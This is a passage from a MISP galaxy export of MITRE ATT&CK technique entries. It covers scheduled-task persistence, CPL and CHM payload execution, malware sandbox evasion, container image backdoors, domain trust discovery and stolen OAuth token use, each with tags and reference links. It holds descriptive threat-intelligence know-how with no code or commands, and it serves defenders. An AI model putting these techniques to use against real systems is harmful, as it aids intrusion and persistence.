Those methods allow for commands or scripts to be executed at specific, periodic intervals in the background without user interaction. An adversary may use job scheduling to execute programs at system startup or on a scheduled basis for Persistence, (Citation: Janicab) (Citation: Methods of Mac Malware Persistence) (Citation: Malware Persistence on OS X) (Citation: Avast Linux Trojan Cron Persistence) to conduct Execution as part of Lateral Movement, to gain root privileges, or to run a process under the context of a specific account.

at

The at program is another means on POSIX-based systems, including macOS and Linux, to schedule a program or script job for execution at a later date and/or time, which could also be used for the same purposes.

launchd

Each launchd job is described by a different configuration property list (plist) file similar to [Launch Daemon](https://attack.mitre.org/techniques/T1160) or [Launch Agent](https://attack.mitre.org/techniques/T1159), except there is an additional key called <code>StartCalendarInterval</code> with a dictionary of time values. (Citation: AppleDocs Scheduling Timed Jobs) This only works on macOS and OS X.

The tag is: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168"

Table 5875. Table References

Links

http://www.thesafemac.com/new-signed-malware-called-janicab/

https://attack.mitre.org/techniques/T1168

https://blog.avast.com/2015/01/06/linux-ddos-trojan-hiding-itself-with-an-embedded-rootkit/

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/ScheduledJobs.html

https://linux.die.net/man/1/at

https://linux.die.net/man/5/crontab

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Control Panel Items - T1196

Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files; the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)

For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)

Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.

The tag is: misp-galaxy:mitre-attack-pattern="Control Panel Items - T1196"

Table 5876. Table References

Links

https://attack.mitre.org/techniques/T1196

https://blog.trendmicro.com/trendlabs-security-intelligence/control-panel-files-used-as-malicious-attachments/

https://msdn.microsoft.com/library/windows/desktop/cc144185.aspx

https://researchcenter.paloaltonetworks.com/2017/11/unit42-new-malware-with-ties-to-sunorcal-discovered/

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

C2 protocol development - T1352

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1352).

Command and Control (C2 or C&C) is a method by which the adversary communicates with malware. An adversary may use a variety of protocols and methods to execute C2 such as a centralized server, peer to peer, IRC, compromised web sites, or even social media. (Citation: HAMMERTOSS2015)

The tag is: misp-galaxy:mitre-attack-pattern="C2 protocol development - T1352"

Table 5877. Table References

Links

https://attack.mitre.org/techniques/T1352

Compiled HTML File - T1223

Compiled HTML files (.chm) are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program)

Adversaries may abuse this technology to conceal malicious code. A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application whitelisting on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017)

The tag is: misp-galaxy:mitre-attack-pattern="Compiled HTML File - T1223"

Table 5878. Table References

Links

https://attack.mitre.org/techniques/T1223

https://docs.microsoft.com/previous-versions/windows/desktop/htmlhelp/microsoft-html-help-1-4-sdk

https://msdn.microsoft.com/windows/desktop/ms524405

https://msdn.microsoft.com/windows/desktop/ms644670

https://msitpros.com/?p=3909

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8625

Create implementation plan - T1232

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1232).

Implementation plans specify how the goals of the strategic plan will be executed. (Citation: ChinaCollectionPlan) (Citation: OrderOfBattle)

The tag is: misp-galaxy:mitre-attack-pattern="Create implementation plan - T1232"

Table 5879. Table References

Links

https://attack.mitre.org/techniques/T1232

Determine operational element - T1242

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1242).

If going from strategic down to tactical or vice versa, an adversary would next consider the operational element, for example the specific company within an industry or the specific agency within a government. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12R) (Citation: DoD Cyber 2015)

The tag is: misp-galaxy:mitre-attack-pattern="Determine operational element - T1242"

Table 5880. Table References

Links

https://attack.mitre.org/techniques/T1242

Identify gap areas - T1225

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1225).

Leadership identifies gap areas that generate a compelling need to generate a Key Intelligence Topic (KIT) or Key Intelligence Question (KIQ). (Citation: ODNIIntegration) (Citation: ICD115)

The tag is: misp-galaxy:mitre-attack-pattern="Identify gap areas - T1225"

Table 5881. Table References

Links

https://attack.mitre.org/techniques/T1225

Map network topology - T1252

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1252).

A network topology is the arrangement of the various elements of a network (e.g., servers, workstations, printers, routers, firewalls, etc.). Mapping a network allows an adversary to understand how the elements are connected or related. (Citation: man traceroute) (Citation: Shodan Tutorial)

The tag is: misp-galaxy:mitre-attack-pattern="Map network topology - T1252"

Table 5882. Table References

Links

https://attack.mitre.org/techniques/T1252

Enumerate client configurations - T1262

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1262).

Client configurations information such as the operating system and web browser, along with additional information such as version or language, are often transmitted as part of web browsing communications. This can be accomplished in several ways including use of a compromised web site to collect details on visiting computers. (Citation: UnseenWorldOfCookies) (Citation: Panopticlick)

The tag is: misp-galaxy:mitre-attack-pattern="Enumerate client configurations - T1262"

Table 5883. Table References

Links

https://attack.mitre.org/techniques/T1262

Identify business relationships - T1272

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1272).

Business relationship information includes the associates of a target and may be discovered via social media sites such as [LinkedIn](https://www.linkedin.com) or public press releases announcing new partnerships between organizations or people (such as key hire announcements in industry articles). This information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationships. (Citation: RSA-APTRecon) (Citation: Scasny2015)

The tag is: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1272"

Identify business relationships - T1272 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1283" with estimative-language:likelihood-probability="almost-certain"

Table 5884. Table References

Links

https://attack.mitre.org/techniques/T1272

Determine physical locations - T1282

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1282).

Physical locality information may be used by an adversary to shape social engineering attempts (language, culture, events, weather, etc.) or to plan for physical actions such as dumpster diving or attempting to access a facility. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Determine physical locations - T1282"

Table 5885. Table References

Links

https://attack.mitre.org/techniques/T1282

Test signature detection - T1292

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1292).

An adversary can test the detections of malicious emails or files by using publicly available services, such as VirusTotal, to see if their files or emails cause an alert. They can also use similar services that are not openly available and don’t publicly publish results, or they can test on their own internal infrastructure. (Citation: WiredVirusTotal)

The tag is: misp-galaxy:mitre-attack-pattern="Test signature detection - T1292"

Table 5886. Table References

Links

https://attack.mitre.org/techniques/T1292

Access Contact List - T1432

An adversary could call standard operating system APIs from a malicious application to gather contact list (i.e., address book) data, or with escalated privileges could directly access files containing contact list data.

The tag is: misp-galaxy:mitre-attack-pattern="Access Contact List - T1432"

Table 5887. Table References

Links

https://attack.mitre.org/techniques/T1432

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

Network Service Scanning - T1423

Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans from the mobile device. This technique may take advantage of the mobile device’s access to an internal enterprise network either through local connectivity or through a Virtual Private Network (VPN).

The tag is: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1423"

Table 5888. Table References

Links

https://attack.mitre.org/techniques/T1423

Archive Collected Data - T1532

Adversaries may compress and/or encrypt data that is collected prior to exfiltration. Compressing data can help to obfuscate its contents and minimize use of network resources. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.

Both compression and encryption are done prior to exfiltration, and can be performed using a utility, programming library, or custom algorithm.

The tag is: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1532"

Table 5889. Table References

Links

https://attack.mitre.org/techniques/T1532

Evade Analysis Environment - T1523

Malicious applications may attempt to detect their operating environment prior to fully executing their payloads. These checks are often used to ensure the application is not running within an analysis environment such as a sandbox used for application vetting, security research, or reverse engineering. Adversaries may use many different checks such as physical sensors, location, and system properties to fingerprint emulators and sandbox environments.(Citation: Talos Gustuff Apr 2019)(Citation: ThreatFabric Cerberus)(Citation: Xiao-ZergHelper)(Citation: Cyberscoop Evade Analysis January 2019) Adversaries may access android.os.SystemProperties via Java reflection to obtain specific system information.(Citation: Github Anti-emulator) Standard values such as phone number, IMEI, IMSI, device IDs, and device drivers may be checked against default signatures of common sandboxes.(Citation: Sophos Anti-emulation)

The tag is: misp-galaxy:mitre-attack-pattern="Evade Analysis Environment - T1523"

Table 5890. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/02/pirated-ios-app-stores-client-successfully-evaded-apple-ios-code-review/

https://attack.mitre.org/techniques/T1523

https://blog.talosintelligence.com/2019/04/gustuff-targets-australia.html

https://github.com/strazzere/anti-emulator

https://news.sophos.com/en-us/2017/04/13/android-malware-anti-emulation-techniques/

https://www.cyberscoop.com/android-malware-motion-detection-trend-micro/

https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html

Conduct passive scanning - T1253

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1253).

Passive scanning is the act of looking at existing network traffic in order to identify information about the communications system. (Citation: SurveyDetectionStrategies) (Citation: CyberReconPaper)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct passive scanning - T1253"

Table 5891. Table References

Links

https://attack.mitre.org/techniques/T1253

Fast Flux DNS - T1325

This technique has been deprecated. Please use [Fast Flux DNS](https://attack.mitre.org/techniques/T1568/001).

A technique in which a fully qualified domain name has multiple IP addresses assigned to it which are swapped with extreme frequency, using a combination of round-robin IP addresses and a short Time-To-Live (TTL) for a DNS resource record. (Citation: HoneynetFastFlux) (Citation: MisnomerFastFlux) (Citation: MehtaFastFluxPt1) (Citation: MehtaFastFluxPt2)

The tag is: misp-galaxy:mitre-attack-pattern="Fast Flux DNS - T1325"

Table 5892. Table References

Links

https://attack.mitre.org/techniques/T1325

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-1/#gref

https://resources.infosecinstitute.com/fast-flux-networks-working-detection-part-2/#gref

Subvert Trust Controls - T1632

Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted applications. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features include: an app being allowed to run because it is signed by a valid code signing certificate; an OS prompt alerting the user that an app came from an untrusted source; or getting an indication that you are about to connect to an untrusted site. The method adversaries use will depend on the specific mechanism they seek to subvert.

The tag is: misp-galaxy:mitre-attack-pattern="Subvert Trust Controls - T1632"

Table 5893. Table References

Links

https://attack.mitre.org/techniques/T1632

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html

Domain registration hijacking - T1326

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1326).

Domain Registration Hijacking is the act of changing the registration of a domain name without the permission of the original registrant. (Citation: ICANNDomainNameHijacking)

The tag is: misp-galaxy:mitre-attack-pattern="Domain registration hijacking - T1326"

Table 5894. Table References

Links

https://attack.mitre.org/techniques/T1326

https://www.icann.org/groups/ssac/documents/sac-007-en

Mine social media - T1273

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1273).

An adversary may research available open source information about a target commonly found on social media sites such as [Facebook](https://www.facebook.com), [Instagram](https://www.instagram.com), or [Pinterest](https://www.pinterest.com). Social media is public by design and provides insight into the interests and potentially inherent weaknesses of a target for exploitation by the adversary. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Mine social media - T1273"

Table 5895. Table References

Links

https://attack.mitre.org/techniques/T1273

Buy domain name - T1328

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1328).

Domain Names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free. (Citation: PWCSofacy2014)

The tag is: misp-galaxy:mitre-attack-pattern="Buy domain name - T1328"

Table 5896. Table References

Links

https://attack.mitre.org/techniques/T1328

Identify business relationships - T1283

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1283).

Business relationship information may be used by an adversary to shape social engineering attempts (exploiting who a target expects to hear from) or to plan for technical actions such as exploiting network trust relationship. (Citation: 11StepsAttackers)

The tag is: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1283"

Identify business relationships - T1283 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify business relationships - T1272" with estimative-language:likelihood-probability="almost-certain"

Table 5897. Table References

Links

https://attack.mitre.org/techniques/T1283

Fake Developer Accounts - T1442

An adversary could use fake identities, payment cards, etc., to create developer accounts to publish malicious applications to app stores. For example, Oberheide and Miller describe use of this technique in (Citation: Oberheide-Bouncer).

Platforms: Android, iOS

The tag is: misp-galaxy:mitre-attack-pattern="Fake Developer Accounts - T1442"

Fake Developer Accounts - T1442 has relationships with:

  • revoked-by: misp-galaxy:mitre-attack-pattern="Deliver Malicious App via Authorized App Store - T1475" with estimative-language:likelihood-probability="almost-certain"

Table 5898. Table References

Links

https://attack.mitre.org/techniques/T1442

Conduct active scanning - T1254

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1254).

Active scanning is the act of sending transmissions to end nodes, and analyzing the responses, in order to identify information about the communications system. (Citation: RSA-APTRecon)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct active scanning - T1254"

Table 5899. Table References

Links

https://attack.mitre.org/techniques/T1254

System Information Discovery - T1426

Adversaries may attempt to get detailed information about a device’s operating system and hardware, including versions, patches, and architecture. Adversaries may use the information from [System Information Discovery](https://attack.mitre.org/techniques/T1426) during automated discovery to shape follow-on behaviors, including whether or not to fully infect the target and/or attempt specific actions.

On Android, much of this information is programmatically accessible to applications through the android.os.Build class. (Citation: Android-Build) iOS is much more restrictive with what information is visible to applications. Typically, applications will only be able to query the device model and which version of iOS it is running.

The tag is: misp-galaxy:mitre-attack-pattern="System Information Discovery - T1426"

Table 5900. Table References

Links

https://attack.mitre.org/techniques/T1426

https://developer.android.com/reference/android/os/Build

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-12.html

Event Triggered Execution - T1624

Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities.

Adversaries may abuse these mechanisms as a means of maintaining persistent access to a victim via automatically and repeatedly executing malicious code. After gaining access to a victim’s system, adversaries may create or modify event triggers to point to malicious content that will be executed whenever the event trigger is invoked.

The tag is: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1624"

Table 5901. Table References

Links

https://attack.mitre.org/techniques/T1624

Identify supply chains - T1246

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1246).

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the technology or interconnections that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain) (Citation: RSA-supply-chain)

The tag is: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1246"

Identify supply chains - T1246 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265" with estimative-language:likelihood-probability="almost-certain"

Table 5902. Table References

Links

https://attack.mitre.org/techniques/T1246

Domain Trust Discovery - T1482

Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the DSEnumerateDomainTrusts() Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)

The tag is: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482"

Table 5903. Table References

Links

https://adsecurity.org/?p=1588

https://attack.mitre.org/techniques/T1482

https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.activedirectory.domain.getalltrustrelationships?redirectedfrom=MSDN&view=netframework-4.7.2#System_DirectoryServices_ActiveDirectory_Domain_GetAllTrustRelationships

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc759554(v=ws.10)

https://posts.specterops.io/a-guide-to-attacking-domain-trusts-971e52cb2944

https://www.microsoft.com/security/blog/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/

Conduct social engineering - T1249

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1249).

Social Engineering is the practice of manipulating people in order to get them to divulge information or take an action. (Citation: SEAttackVectors) (Citation: BeachSE2003)

The tag is: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1249"

Conduct social engineering - T1249 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Conduct social engineering - T1268" with estimative-language:likelihood-probability="almost-certain"

Table 5904. Table References

Links

https://attack.mitre.org/techniques/T1249

Stored Data Manipulation - T1492

Adversaries may insert, delete, or manipulate data at rest in order to manipulate external outcomes or hide activity.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating stored data, adversaries may attempt to affect a business process, organizational understanding, and decision making.

Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.

The tag is: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1492"

Table 5905. Table References

Links

https://attack.mitre.org/techniques/T1492

https://content.fireeye.com/apt/rpt-apt38

https://www.justice.gov/opa/press-release/file/1092091/download

Implant Internal Image - T1525

Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)

A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Implant Internal Image - T1525"

Table 5906. Table References

Links

https://attack.mitre.org/techniques/T1525

https://github.com/RhinoSecurityLabs/ccat

https://rhinosecuritylabs.com/aws/cloud-container-attack-tool/

Cloud Service Discovery - T1526

An adversary may attempt to enumerate the cloud services running on a system after gaining access. These methods can differ from platform-as-a-service (PaaS), to infrastructure-as-a-service (IaaS), or software-as-a-service (SaaS). Many services exist throughout the various cloud providers and can include Continuous Integration and Continuous Delivery (CI/CD), Lambda Functions, Azure AD, etc. They may also include security services, such as AWS GuardDuty and Microsoft Defender for Cloud, and logging services, such as AWS CloudTrail and Google Cloud Audit Logs.

Adversaries may attempt to discover information about the services enabled throughout the environment. Azure tools and APIs, such as the Azure AD Graph API and Azure Resource Manager API, can enumerate resources and services, including applications, management groups, resources and policy definitions, and their relationships that are accessible by an identity.(Citation: Azure - Resource Manager API)(Citation: Azure AD Graph API)

For example, Stormspotter is an open source tool for enumerating and constructing a graph for Azure resources and services, and Pacu is an open source AWS exploitation framework that supports several methods for discovering cloud services.(Citation: Azure - Stormspotter)(Citation: GitHub Pacu)

Adversaries may use the information gained to shape follow-on behaviors, such as targeting data or credentials from enumerated services or evading identified defenses through [Disable or Modify Tools](https://attack.mitre.org/techniques/T1562/001) or [Disable or Modify Cloud Logs](https://attack.mitre.org/techniques/T1562/008).

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Service Discovery - T1526"

Table 5907. Table References

Links

https://attack.mitre.org/techniques/T1526

https://docs.microsoft.com/en-us/previous-versions/azure/ad/graph/howto/azure-ad-graph-api-operations-overview

https://docs.microsoft.com/en-us/rest/api/resources/

https://github.com/Azure/Stormspotter

https://github.com/RhinoSecurityLabs/pacu

Device Driver Discovery - T1652

Adversaries may attempt to enumerate local device drivers on a victim host. Information about device drivers may highlight various insights that shape follow-on behaviors, such as the function/purpose of the host, present security tools (i.e. [Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) or other defenses (e.g., [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497)), as well as potential exploitable vulnerabilities (e.g., [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)).

Many OS utilities may provide information about local device drivers, such as driverquery.exe and the EnumDeviceDrivers() API function on Windows.(Citation: Microsoft Driverquery)(Citation: Microsoft EnumDeviceDrivers) Information about device drivers (as well as associated services, i.e., [System Service Discovery](https://attack.mitre.org/techniques/T1007)) may also be available in the Registry.(Citation: Microsoft Registry Drivers)

On Linux/macOS, device drivers (in the form of kernel modules) may be visible within /dev or using utilities such as lsmod and modinfo.(Citation: Linux Kernel Programming)(Citation: lsmod man)(Citation: modinfo man)

The tag is: misp-galaxy:mitre-attack-pattern="Device Driver Discovery - T1652"

Table 5908. Table References

Links

https://attack.mitre.org/techniques/T1652

https://learn.microsoft.com/windows-hardware/drivers/install/overview-of-registry-trees-and-keys

https://learn.microsoft.com/windows-server/administration/windows-commands/driverquery

https://learn.microsoft.com/windows/win32/api/psapi/nf-psapi-enumdevicedrivers

https://linux.die.net/man/8/modinfo

https://man7.org/linux/man-pages/man8/lsmod.8.html

https://www.tldp.org/LDP/lkmpg/2.4/lkmpg.pdf

Hijack Execution Flow - T1625

Adversaries may execute their own malicious payloads by hijacking the way operating systems run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur over time.

There are many ways an adversary may hijack the flow of execution. A primary way is by manipulating how the operating system locates programs to be executed. How the operating system locates libraries to be used by a program can also be intercepted. Locations where the operating system looks for programs or resources, such as file directories, could also be poisoned to include malicious payloads.

The tag is: misp-galaxy:mitre-attack-pattern="Hijack Execution Flow - T1625"

Table 5909. Table References

Links

https://attack.mitre.org/techniques/T1625

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

Identify supply chains - T1265

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1265).

Supply chains include the people, processes, and technologies used to move a product or service from a supplier to a consumer. Understanding supply chains may provide an adversary with opportunities to exploit the people, their positions, and relationships, that are part of the supply chain. (Citation: SmithSupplyChain) (Citation: CERT-UKSupplyChain)

The tag is: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1265"

Identify supply chains - T1265 has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Identify supply chains - T1276" with estimative-language:likelihood-probability="almost-certain"

Table 5910. Table References

Links

https://attack.mitre.org/techniques/T1265

Application Access Token - T1527

Adversaries may use application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)

For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)

Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services to which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

The tag is: misp-galaxy:mitre-attack-pattern="Application Access Token - T1527"

Table 5911. Table References

Links

https://attack.mitre.org/techniques/T1527

https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/

https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen

https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens

https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/

Determine firmware version - T1258

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1258).

Firmware is permanent software programmed into the read-only memory of a device. As with other types of software, firmware may be updated over time and have multiple versions. (Citation: Abdelnur Advanced Fingerprinting)

The tag is: misp-galaxy:mitre-attack-pattern="Determine firmware version - T1258"

Table 5912. Table References

Links

https://attack.mitre.org/techniques/T1258

Identify supply chains - T1276

This object is deprecated as its content has been merged into the enterprise domain. Please see the [PRE](http://attack.mitre.org/matrices/enterprise/pre/) matrix for its replacement. The prior content of this page has been preserved [here](https://attack.mitre.org/versions/v7/techniques/T1276).

